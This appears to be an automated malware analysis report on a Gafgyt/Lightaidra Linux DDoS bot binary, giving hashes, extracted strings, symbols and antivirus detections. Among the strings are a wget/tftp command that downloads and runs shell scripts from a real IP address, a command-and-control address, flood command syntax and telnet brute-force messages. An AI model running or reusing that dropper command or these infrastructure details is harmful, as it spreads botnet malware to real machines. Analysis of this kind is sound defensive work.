Report #1832

Binary
ABI
ELFOSABI_SYSV
Size
133.73KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
8fe3321ad236dc3357853fb0f42fd5f6
sha1
2bbcb5ae40f614ab895864c23a91770055979c34
crc32
0x147304f2
sha224
57cd7c25676d0fea5bc9bbf744ea000e6e6fb8073febb6974d9efaf5
sha256
c8c19855b1fecdc283bd419724eb4637406c1827992b201c7520680bcd218ac9
sha384
6ee94c59fd17ad839531ae8eadbdd45082224246f8d774671b90b145b2dfef719e703eec4b72b3d809714d54ca6738b4
sha512
66d79ad283308d0e000a2e22bb4382b7c343ad36a7ec3feeb55a5246c87276721cb08b486ad3456c672bf58a7048e58b7447d1c6f1dd5d2e64f7b381f40cf725
ssdeep
3072:dZLYkGGNEZJaFUYwtisudhQ3QQPZmALIEJY7TG:YOMufdXsZmALIEy7TG
Community
Google
False
HashLib
False
YARA
Matches
maldoc_getEIP_method_1, domain, url, IP, contentis_base64, is__elf

Suspicious
True

Dwarf
List

Number
0
Files
Sys
/sys/devices/system/cpu
Home

Proc
/proc/cpuinfo, /proc/net/route, ?/proc/stat, /proc/cpuinfo
Password

Suspicious
True
Flags
Flags
0
Packer
List
None
Packed
False
Network
IPs
185.106.122.57:555, Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, cd /tmp || cd /var/run;wget http://185.106.122.57/bin.sh;sh bin.sh;rm -rf bin.sh;tftp -r bin2.sh -g 185.106.122.57;sh bin2.sh; tftp 185.106.122.57 -c get bin3.sh; sh bin3.sh; rm -rf bin2.sh bin3.sh bin.sh, 185.106.122.57
URLs
cd /tmp || cd /var/run;wget http://185.106.122.57/bin.sh;sh bin.sh;rm -rf bin.sh;tftp -r bin2.sh -g 185.106.122.57;sh bin2.sh; tftp 185.106.122.57 -c get bin3.sh; sh bin3.sh; rm -rf bin2.sh bin3.sh bin.sh, GET gtop.sh
Mails

Suspicious
True
Strings
List
cd /tmp || cd /var/run;wget http://185.106.122.57/bin.sh;sh bin.sh;rm -rf bin.sh;tftp -r bin2.sh -g 185.106.122.57;sh bin2.sh; tftp 185.106.122.57 -c get bin3.sh; sh bin3.sh; rm -rf bin2.sh bin3.sh bin.sh
185.106.122.57:555
GET gtop.sh
/etc/rc.conf
.got.plt
/etc/resolv.conf
None Killed.
Network is down
Machine is not on the network
Killed %d.
No route to host
Host is down
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Unknown host
Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
185.106.122.57
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)
been_there_done_that
_fwrite.c
__write_nocancel
libc-cancellation.c
contains_fail
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Transport endpoint is not connected
No such process
Block device required
TELNET LOGIN CRACKED - %s:%s:%s
No such device or address
Remote address changed
Telnet'd %s|%s|%s|23
Operation now in progress
Connection reset by peer
Link has been severed
No such device
Object is remote
Too many open files
Is a named type file
Too many open files in system
Too many links
fork failed
infected
unctelnet %s|%s|%s|23
REPORT %s:%s:%s
Version: %d.%d
Range %d->%d
.lib section in a.out corrupted
Cannot send after transport endpoint shutdown
>%s.t && cd %s ; >retrieve
Operation not permitted
My IP: %s
FUK YEA I DO (%s)
Invalid flag "%s"
8.8.8.8
My Public IP: %s
TEST %s
BUILD %s
BUILD %s
hoste.6860
dnslookup.c
Too many users
__GI_execl
__dns_lookup
__GI_fflush_unlocked
PONG!
__GI_gethostname
__libc_nanosleep
__GI_sleep
__local_nameserver
__open_nameservers
__nameserver
__socketcall
__syscall_nanosleep
__close_nameservers
__register_atfork
__GI_execve
__register_frame_info_bases
usleep.c
/etc/hosts
__GI_pipe
_Jv_RegisterClasses
get_telstate_host
__deregister_frame_info_bases
closenameservers.c
socket_connect
gethostbyname_r
gethostbyname.c
gethostname.c
opennameservers.c
register-atfork.c
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
fflush_unlocked.c
__GI_nanosleep

Symbols
List
crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, __do_global_dtors_aux, completed.4963, p.4961, frame_dummy, object.4975, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, client.c, c, Q, i.4874, printchar, prints, printi, print, fdopen_pids, hextable, ipState, __syscall_fcntl.c, _exit.c, chdir.c, dup2.c, getcwd.c, getdtablesize.c, getpagesize.c, getrlimit.c, ioctl.c, kill.c, pipe.c, prctl.c, select.c, __syscall_select, setsid.c, sigprocmask.c, time.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_b_data, __C_ctype_toupper.c, __C_ctype_toupper_data, errno.c, __errno_location.c, fclose.c, _L_lock_18, _L_lock_53, _L_unlock_65, _L_unlock_82, _L_lock_103, _L_unlock_113, fopen.c, perror.c, printf.c, fprintf.c, snprintf.c, sprintf.c, vsnprintf.c, _fopen.c, _L_lock_205, _L_lock_216, _L_unlock_232, _L_unlock_242, _stdio.c, _stdio_streams, _fixed_buffers, _wcommit.c, vfprintf.c, _L_lock_18, _L_unlock_62, _vfprintf_internal.c, _charpad, _fp_out_narrow, spec_base.6615, prefix.6616, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type_codes, type_sizes, spec_flags.6620, qual_chars.6625, spec_chars.6621, spec_ranges.6622, spec_or_mask.6623, spec_and_mask.6624, _bss_custom_printf_spec, feof.c, _L_lock_17, _L_unlock_35, fgets.c, _L_lock_18, _L_unlock_43, fputs.c, _L_lock_18, _L_unlock_43, fflush_unlocked.c, _L_lock_13, _L_lock_30, _L_unlock_88, _L_unlock_104, _L_lock_144, _L_unlock_156, _L_lock_164, _L_unlock_174, _L_lock_195, _L_unlock_239, fgets_unlocked.c, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strcat.c, strchr.c, strcmp.c, strcpy.c, strlen.c, strncpy.c, strnlen.c, strstr.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unknown.1636, _string_syserrmsgs.c, bcopy.c, bzero.c, strcasecmp.c, strcasestr.c, strtok.c, next_start.1613, isatty.c, tcgetattr.c, ntohl.c, herror.c, error_msg, h_errlist, colon_space.4870, inet_ntoa.c, buf.4724, inet_makeaddr.c, 
gethostbyname.c, gethostbyname2.c, buf.6861, hoste.6860, connect.c, getsockname.c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, shutdown.c, socket.c, sigaddset.c, sigempty.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, realloc.c, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, unsafe_state, randtbl, random_r.c, random_poly_info, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sysconf.c, nprocessors_onln, usleep.c, fork.c, _L_lock_70, _L_unlock_167, register-atfork.c, _L_lock_28, fork_handler_pool, _L_unlock_93, getpid.c, raise.c, sleep.c, pseudo_cancel, SAVEBX1, RESTBX1, pseudo_end, pseudo_cancel, PUSHBX1, POPBX1, pseudo_end, pseudo_cancel, PUSHBX1, POPBX1, pseudo_end, pseudo_cancel, PUSHBX1, POPBX1, pseudo_end, pseudo_cancel, PUSHBX1, POPBX1, pseudo_end, libc-cancellation.c, __uClibc_main.c, __pthread_return_0, __check_one_fd, system.c, cancel_handler, lock, _L_lock_30, sa_refcntr, quit, intr, _L_unlock_52, do_system, _L_lock_74, _L_unlock_113, _L_lock_129, _L_unlock_158, _L_lock_288, _L_unlock_328, __syscall_error.c, sigaction.c, __restore_rt, __restore, __socketcall.c, __syscall_rt_sigaction.c, execve.c, getegid.c, geteuid.c, getgid.c, getuid.c, mremap.c, munmap.c, nanosleep.c, __syscall_nanosleep, sbrk.c, __C_ctype_tolower.c, __C_ctype_tolower_data, closedir.c, opendir.c, fd_to_DIR, C.11.5298, readdir64.c, parse_config.c, wcrtomb.c, wcsrtombs.c, wcsnrtombs.c, _WRITE.c, _fwrite.c, _trans2w.c, _load_inttype.c, _store_inttype.c, _uintmaxtostr.c, _fpmaxtostr.c, fmt, exp10_table, fgetc.c, _L_lock_35, _L_unlock_65, fgetc_unlocked.c, memmove.c, strchrnul.c, strrchr.c, memrchr.c, strcspn.c, strspn.c, strtok_r.c, strpbrk.c, inet_aton.c, gethostbyname2_r.c, calloc.c, libc-tls.c, init_static_tls, static_slotinfo, static_dtv, static_map, dl-support.c, brk.c, fstat.c, xstatconv.c, getdents64.c, fseeko.c, fseeko64.c, _L_lock_34, _L_unlock_108, _READ.c, _adjust_pos.c, _rfill.c, _trans2r.c, _cs_funcs.c, 
rawmemchr.c, mempcpy.c, ntop.c, inet_pton4, xdigits.5147, inet_ntop4, decoded.c, dnslookup.c, last_id.6918, last_ns_num.6917, opennameservers.c, skip_nospace, skip_and_NUL_space, resolv_conf_mtime.6903, closenameservers.c, get_hosts_byname_r.c, gethostbyname_r.c, gethostname.c, poll.c, __syscall_poll, stat.c, uname.c, llseek.c, strdup.c, encodeh.c, decodeh.c, encodeq.c, read_etc_hosts_r.c, encoded.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __read_etc_hosts_r, __GI_execve, __libc_sigaction, strcpy, recvLine, rangesA, __GI_sigaddset, __socketcall, __GI___ctype_b, __GI___glibc_strerror_r, waitpid, __res_sync, __open_nameservers, __GI_fopen, getrlimit, ioctl, _stdio_openlist_use_count, __GI_initstate_r, __GI_sigaction, strtok_r, __GI_time, getgid, __getpid, sysconf, printf, stdout, random, __GI_strdup, __GI_getpagesize, getdtablesize, fdopendir, contains_fail, __GI___ctype_toupper, __GI_strcasecmp, recv, connect, spoofTest, __encode_question, __GI___uClibc_fini, numpids, __encode_header, sigemptyset, getRandomPublicIPB, __pthread_mutex_lock, initConnection, __sigdelset, __xstat32_conv, __uClibc_fini, memrchr, geteuid, inet_pton, __GI_snprintf, __GI_vsnprintf, __GI_setsid, memmove, sendTCP, snprintf, __GI_strpbrk, __GI_fgetc, __GI_htonl, __stdio_trans2r_o, munmap, __GI_setsockopt, __libc_stack_end, __GI_fclose, __GI_wcsnrtombs, __GI_pipe, rangesB2, _uintmaxtostr, __libc_fcntl, atol, getRandomPublicIP, __write, getc_unlocked, __ctype_b, __GI_random_r, usernames, errno, getegid, read_until_response, __GI_sbrk, zprintf, __GI___uClibc_init, usleep, __libc_h_errno, execve, infectedmessage, getpagesize, getpid, __GI_lseek64, setstate_r, fgets, getHost, wildString, dupppp, __waitpid_nocancel, __xpg_strerror_r, __read, getc, prctl, _dl_tls_static_used, memcpy, makeRandomStr, getRandomIP, __GI_fputs_unlocked, execl, __GI_fgets, perror, __GI___open_nocancel, sendHTTP, 
_stdio_openlist_dec_use, sclose, __libc_select, _ppfs_init, __GI___C_ctype_toupper, __GI_fgetc_unlocked, __libc_nanosleep, trim, __GI_fgets_unlocked, dup2, __pthread_mutex_init, getuid, __GI_htons, system, __open_etc_hosts, feof, malloc, __open, isatty, sleep, vsnprintf, __dns_lookup, __GI_read, __C_ctype_tolower, __GI___write_nocancel, random_r, __dso_handle, __nptl_deallocate_tsd, gethostbyname_r, tcpcsum, reset_telstate, fdpclose, socket, __GI_dup2, select, _dl_nothread_init_static_tls, __GI_ntohl, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fcntl, __GI_memset, __GI_closedir, isspace, __stdio_seek, mempcpy, __GI_strcoll, __GI_write, __ctype_toupper, __resolv_timeout, __libc_read, __GI_opendir, __libc_disable_asynccancel, _string_syserrmsgs, __GI_herror, __GI_open, __GI_strchr, __searchdomain, sigaddset, _dl_tls_static_align, __GI_tcgetattr, __environ, mmap, __GI_ntohs, _Exit, wcsnrtombs, bzero, makeIPPacket, _dl_tls_max_dtv_idx, sockprintf, __GI_inet_ntoa, send, __fgetc_unlocked, abort, oldranges, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, __GI___register_atfork, __GI_getgid, srandom_r, __GI_fputs, __open_nocancel, _init, __GI_inet_ntoa_r, __GI_setstate_r, parseHex, strtol, __GI___read, pipe, strnlen, rawmemchr, uname, __GI_mempcpy, __malloc_state, __sigaddset, strrchr, nanosleep, __GI_send, calloc, h_errno, sendHTTP2, __pthread_mutex_unlock, __register_frame_info_bases, __GI_exit, __app_fini, csum, __exit_cleanup, rindex, __GI_execl, __GI_srandom_r, __GI___sigismember, __GI___ctype_tolower, write, __fork_generation_pointer, environ, __GI_close, getBuild, fstat, fprintf, __resolv_lock, kill, fputs_unlocked, __pthread_mutex_trylock, __GI___sigaddset, strcat, __GI_brk, __GI_strcat, _dl_tls_static_size, __GI_nanosleep, __GI_stat, __GI_strtok, _stdio_openlist, __GI_sigprocmask, inet_addr, ntohl, __GI_gethostname, __GI_fseek, _custom_printf_arginfo, __GI___libc_write, ourIP, chdir, fseeko, _stdio_openlist_del_count, connectTimeout, setsockopt, 
bsd_signal, fseek, mremap, __GI_kill, __GI_strcmp, __GI___open, __GI_memmove, sendSTD, setstate, __read_nocancel, __decode_dotted, __local_nameserver, __stdio_READ, __GI_toupper, __pthread_initialize_minimal, __GI_recv, tmpdirs, __stdin, stdin, __GI_isatty, _dl_tls_dtv_slotinfo_list, _custom_printf_spec, gethostbyname2_r, __progname, strcasestr, _start, __deregister_frame_info_bases, __GI___read_nocancel, strstr, __GI_ioctl, init_rand, rand, __close_nameservers, __libc_errno, getRandomPublicIP2, signal, read, __xstat64_conv, __decode_header, getCores, __GI_memcpy, strcoll, rangesC1, oldranges2, wcsrtombs, _stdio_user_locking, __linkin_atfork, strncpy, __GI___libc_close, program_invocation_short_name, strcasecmp, htonl, sendto, __C_ctype_toupper, StartTheLelz, __GI___C_ctype_b, realloc, __register_atfork, __GI_gethostbyname_r, __GI_strncpy, _dl_tls_dtv_gaps, __libc_send, __GI___xpg_strerror_r, currentServer, readdir64, __GI___C_ctype_tolower, __GI_getrlimit, bcopy, __GI_strcpy, __GI_inet_ntop, strtok, __stdio_adjust_position, malloc_trim, __GI_poll, _vfprintf_internal, __GI_strcasestr, fork, __GI___fcntl_nocancel, __stdio_rfill, gotIP, __GI_sleep, sigaction, __GI_gethostbyname, _dl_phdr, __GI_getc_unlocked, __uClibc_init, __GI_munmap, versionnnn, _store_inttype, __getpagesize, __GI_random, __GI_mremap, __syscall_error, __uclibc_progname, __GI_getegid, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, strdup, __libc_close, __GI_getpid, inet_aton, _pthread_cleanup_push_defer, index, processCmd, __sigismember, fopen, __bss_start, __libc_open, __pthread_unwind, __GI_strchrnul, getOurIP, get_telstate_host, memset, __GI_socket, main, __glibc_strerror_r, ourPublicIP, echoLoader, listFork, __stdio_fwrite, _dl_tls_setup, negotiate, srand, _dl_tls_generation, __GI_uname, __resolv_attempts, __nptl_nthreads, initstate, fclose, __syscall_rt_sigaction, rangesC3, ntohs, sendUDP, inet_ntoa, tcgetattr, time, opendir, __libc_system, __GI_abort, poll, __GI___write, fdpopen, 
__GI_fprintf, __GI___sigdelset, __get_hosts_byname_r, __GI___close_nocancel, rangesB1, __GI__exit, herror, strcmp, infected, __GI_strrchr, shutdown, advances2, __nameserver, data_start, __GI_sysconf, __fork_handlers, infect, __h_errno_location, matchPrompt, getcwd, __GI_inet_pton, __libc_enable_asynccancel, gethostbyname, _stdio_fopen, advance_state, _fini, __GI_chdir, __write_nocancel, __vfork, __GI_mmap, fgetc, gethostname, contains_success, sprintf, fdgets, __get_pc_thunk_bx, strerror_r, __GI_select, __libc_waitpid, strcspn, socket_connect, __GI_waitpid, _stdio_term, __GI_vfprintf, __GI_signal, stderr, fails, __GI_readdir64, commServer, getRandomPublicIPC, vfork, __C_ctype_b, __libc_setup_tls, srandom, _ppfs_setargs, __GI___libc_waitpid, __GI_sendto, __GI_sigemptyset, __GI_printf, __waitpid, __libc_fork, __close_nocancel, _dl_init_static_tls, __atexit_lock, scanPid, __fork_lock, __fcntl_nocancel, rand_cmwc, findARandomIP, advances, getsockopt, __GI_fseeko64, _dl_tls_static_nelem, hstrerror, fflush_unlocked, __stdio_wcommit, contains_string, __GI___fgetc_unlocked, __nameservers, fwrite_unlocked, subversionnnn, stat, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, contains_response, __GI___waitpid, __close, __GI_gethostbyname2, _edata, __stdout, __GI___close, __GI_memrchr, __GI_fflush_unlocked, __GI_isspace, __GI_strstr, __searchdomains, __GI_fstat, _end, htons, _sigintr, _ppfs_prepargs, __GI_strspn, fgetc_unlocked, initstate_r, __GI_connect, __curbrk, contains_infectmessage, _dl_phnum, _fpmaxtostr, __errno_location, uppercase, _stdlib_strto_l, __GI___libc_open, exit, rangesC2, __stdio_WRITE, _stdio_init, __GI_geteuid, inet_ntop, brk, gethostbyname2, __GI_getcwd, _dl_aux_init, __GI_perror, atoi, successes, _stdio_openlist_del_lock, __GI_inet_aton, _custom_printf_handler, _setjmp, fgets_unlocked, _exit, szprintf, strspn, __libc_recv, __getdents64, __lll_lock_wait_private, strlen, lseek64, open, program_invocation_name, toupper, __libc_write, 
__malloc_consolidate, _ppfs_parsespec, __GI_strtol, __GI_getuid, __GI_strtok_r, __fork, __libc_sendto, __stdio_trans2w_o, __GI_vfork, __GI_config_read, strchr, __GI_rawmemchr, __GI_gethostbyname2_r, fputs, __GI_raise, __data_start, setsid, __GI_inet_addr, __GI_config_open, closedir, getRandomPublicIPA, __encode_dotted, __GI_strnlen, _Jv_RegisterClasses, macAddress, __GI___libc_read, __GI___errno_location, strchrnul, readUntil, fcntl, read_with_timeout, __GI_atoi, fseeko64, __GI_sprintf, __ctype_tolower, wcrtomb, __GI_getsockname, close, __GI_config_close, __libc_connect, passwords, __GI_strlen, mainCommSock, pids, sendCNC, vfprintf, __progname_full, strpbrk, getBogos, _load_inttype, __lll_unlock_wake_private, rangechoice, raise, useragents, free, __GI_strcspn, sigprocmask, getsockname
Number
965
Reason
None
Suspicious
False
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False
Sections
List
, .init, .text, .fini, .rodata, .eh_frame, .tbss, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .stab, .stabstr, .comment, .shstrtab, .symtab, .strtab
Number
19
Suspicious
False
Segments
Number
4
Suspicious
False
Compilers
List
GCC: (GNU) 4.2.1
Identified
184
Suspicious
True
Functions
List
, __GI_vfork, , __GI_config_read, , strchr, , __GI_rawmemchr, , __GI_gethostbyname2_r, , fputs, , __GI_raise, , __data_start, , setsid, , __GI_inet_addr, , __GI_config_open, , closedir, , getRandomPublicIPA, , __encode_dotted, , __GI_strnlen, , _Jv_RegisterClasses, , macAddress, , __GI___libc_read, , __GI___errno_location, , strchrnul, , readUntil, , fcntl, , read_with_timeout, , __GI_atoi, , fseeko64, , __GI_sprintf, , __ctype_tolower, , wcrtomb, , __GI_getsockname, , close, , __GI_config_close, , __libc_connect, , passwords, , __GI_strlen, , mainCommSock, , pids, , sendCNC, , vfprintf, , __progname_full, , strpbrk, , getBogos, , _load_inttype, , __lll_unlock_wake_private, , rangechoice, , raise, , useragents, , free, , __GI_strcspn, , sigprocmask, , getsockname,
Present
True
Anti-Debug
Ptrace
False
Anti-disasm
False
Entry Point
Address
0x8048188
Suspicious
False
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
4
Offset
52
Section Header
Size
40
Number
19
Offset
109160
AVclass
gafgyt
1
VirusTotal
md5
8fe3321ad236dc3357853fb0f42fd5f6
sha1
2bbcb5ae40f614ab895864c23a91770055979c34
SCANS (DETECTION RATE = 56.90%)
AVG
result: ELF:DDoS-Y [Trj]
update: 20170914
version: 17.6.3625.0
detected: True

CMC
update: 20170913
version: 1.1.0.977
detected: False

MAX
result: malware (ai score=80)
update: 20170914
version: 2017.6.26.1
detected: True

K7GW
update: 20170914
version: 10.26.24608
detected: False

ALYac
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170914
version: 1.1.1.2
detected: True

Avast
result: ELF:DDoS-Y [Trj]
update: 20170914
version: 17.6.3625.0
detected: True

Avira
result: DDOS/LNX.Lightaidra.tqpzp
update: 20170913
version: 8.3.3.4
detected: True

Baidu
update: 20170914
version: 1.0.0.2
detected: False

Cyren
result: ELF/Backdoor.SDAP-9
update: 20170914
version: 5.4.30.7
detected: True

DrWeb
result: Linux.BackDoor.Fgt.92
update: 20170914
version: 7.0.28.2020
detected: True

GData
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170914
version: A:25.14183B:25.10428
detected: True

Panda
update: 20170913
version: 4.6.4.2
detected: False

VBA32
update: 20170913
version: 3.12.26.4
detected: False

VIPRE
update: 20170914
version: 61004
detected: False

Zoner
update: 20170914
version: 1.0
detected: False

AVware
update: 20170914
version: 1.5.0.42
detected: False

ClamAV
update: 20170914
version: 0.99.2.0
detected: False

Comodo
update: 20170914
version: 27755
detected: False

F-Prot
update: 20170914
version: 4.7.1.166
detected: False

Ikarus
result: Trojan.Linux.Gafgyt
update: 20170913
version: 0.1.5.2
detected: True

McAfee
result: RDN/Generic BackDoor
update: 20170914
version: 6.0.6.653
detected: True

Rising
result: Backdoor.Gafgyt/Linux!1.A512 (classic)
update: 20170914
version: 25.0.0.1
detected: True

Sophos
result: Linux/DDoS-BI
update: 20170914
version: 4.98.0
detected: True

Yandex
update: 20170908
version: 5.5.1.3
detected: False

Zillya
update: 20170913
version: 2.0.0.3385
detected: False

Arcabit
result: Trojan.Backdoor.Linux.Gafgyt.1
update: 20170913
version: 1.0.0.817
detected: True

Tencent
result: Linux.Backdoor.Gafgyt.Egop
update: 20170914
version: 1.0.0.1
detected: True

ViRobot
update: 20170914
version: 2014.3.20.0
detected: False

Webroot
update: 20170914
version: 1.0.0.207
detected: False

Ad-Aware
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170914
version: 3.0.3.1010
detected: True

AegisLab
result: Backdoor.Linux.Gafgyt!c
update: 20170914
version: 4.2
detected: True

Emsisoft
result: Gen:Variant.Backdoor.Linux.Gafgyt.1 (B)
update: 20170914
version: 4.0.1.883
detected: True

F-Secure
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170914
version: 11.0.19100.45
detected: True

Fortinet
result: ELF/Gafgyt.WN!tr.bdr
update: 20170914
version: 5.4.247.0
detected: True

Jiangmin
result: Backdoor.Linux.nak
update: 20170914
version: 16.0.100
detected: True

Kingsoft
update: 20170914
version: 2013.8.14.323
detected: False

Symantec
result: Trojan.Gen.NPE.2
update: 20170913
version: 1.4.0.0
detected: True

nProtect
update: 20170914
version: 2017-09-14.01
detected: False

AhnLab-V3
update: 20170914
version: 3.10.0.18405
detected: False

Antiy-AVL
result: Trojan[Backdoor]/Linux.Gafgyt.af
update: 20170914
version: 3.0.0.1
detected: True

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.af
update: 20170914
version: 15.0.1.13
detected: True

Microsoft
result: DDoS:Linux/Lightaidra
update: 20170914
version: 1.1.14104.0
detected: True

Qihoo-360
result: Win32/Backdoor.746
update: 20170914
version: 1.0.0.1120
detected: True

TheHacker
update: 20170911
version: 6.8.0.5.1904
detected: False

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.af
update: 20170914
version: 1.0
detected: True

ESET-NOD32
result: a variant of Linux/Gafgyt.C
update: 20170914
version: 16079
detected: True

TrendMicro
result: TROJ_GEN.F04JC00H817
update: 20170914
version: 9.862.0.1074
detected: True

WhiteArmor
update: 20170829
detected: False

BitDefender
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170914
version: 7.2
detected: True

K7AntiVirus
update: 20170914
version: 10.26.24609
detected: False

Malwarebytes
update: 20170914
version: 2.1.1.1115
detected: False

TotalDefense
update: 20170913
version: 37.1.62.1
detected: False

CAT-QuickHeal
update: 20170913
version: 14.00
detected: False

NANO-Antivirus
result: Trojan.Unix.Gafgyt.eohbfa
update: 20170914
version: 1.0.98.19134
detected: True

MicroWorld-eScan
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20170913
version: 12.0.250.0
detected: True

SUPERAntiSpyware
update: 20170914
version: 5.6.0.1032
detected: False

McAfee-GW-Edition
result: RDN/Generic BackDoor
update: 20170914
version: v2015
detected: True

TrendMicro-HouseCall
result: TROJ_GEN.F04JC00H817
update: 20170914
version: 9.950.0.1006
detected: True

total
58
sha256
c8c19855b1fecdc283bd419724eb4637406c1827992b201c7520680bcd218ac9
scan_id
c8c19855b1fecdc283bd419724eb4637406c1827992b201c7520680bcd218ac9-1505364566
resource
8fe3321ad236dc3357853fb0f42fd5f6
positives
33
scan_date
2017-09-14 04:49:26
verbose_msg
Scan finished, information embedded
response_code
1
Binary
RF
confidence: 100.00%
suspicious: True
MLP
confidence: 99.98%
suspicious: True
SVM
confidence: 98.80%
suspicious: True